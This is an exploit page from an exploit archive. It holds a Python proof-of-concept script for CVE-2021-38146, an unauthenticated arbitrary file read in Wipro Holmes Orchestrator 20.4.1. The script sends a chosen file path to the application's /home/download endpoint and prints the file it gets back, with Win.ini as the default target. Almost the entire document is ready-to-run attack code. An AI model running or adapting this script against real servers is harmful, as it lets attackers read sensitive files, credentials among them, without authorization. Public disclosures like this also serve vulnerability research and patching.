Share
## https://sploitus.com/exploit?id=PACKETSTORM:164970
# Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC  
# Date: 05/08/2021  
# Exploit Author: Rizal Muhammed @ub3rsick  
# Vendor Homepage: https://www.wipro.com/holmes/  
# Version: 20.4.1  
# Tested on: Windows 10 x64  
# CVE : CVE-2021-38146  
  
import requests as rq  
import argparse  
  
port = 8001 # change port if application is running on different port  
  
def file_download(host, filepath):  
vuln_url = "http://%s:%s/home/download" % (host, port)  
data = {  
"SearchString": filepath,  
"Msg": ""  
}  
  
hdr = {  
"content-type": "application/json"  
}  
  
resp = rq.post(vuln_url, headers=hdr, json=data)  
  
print resp.text  
  
def main():  
parser = argparse.ArgumentParser(  
description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",  
epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"  
)  
parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)  
parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")  
args = parser.parse_args()  
  
if "\\" in args.file_path:  
fp = args.file_path.replace("\\", "/")  
else:  
fp = args.file_path  
file_download(args.target_ip, fp)  
  
if __name__ == "__main__":  
main()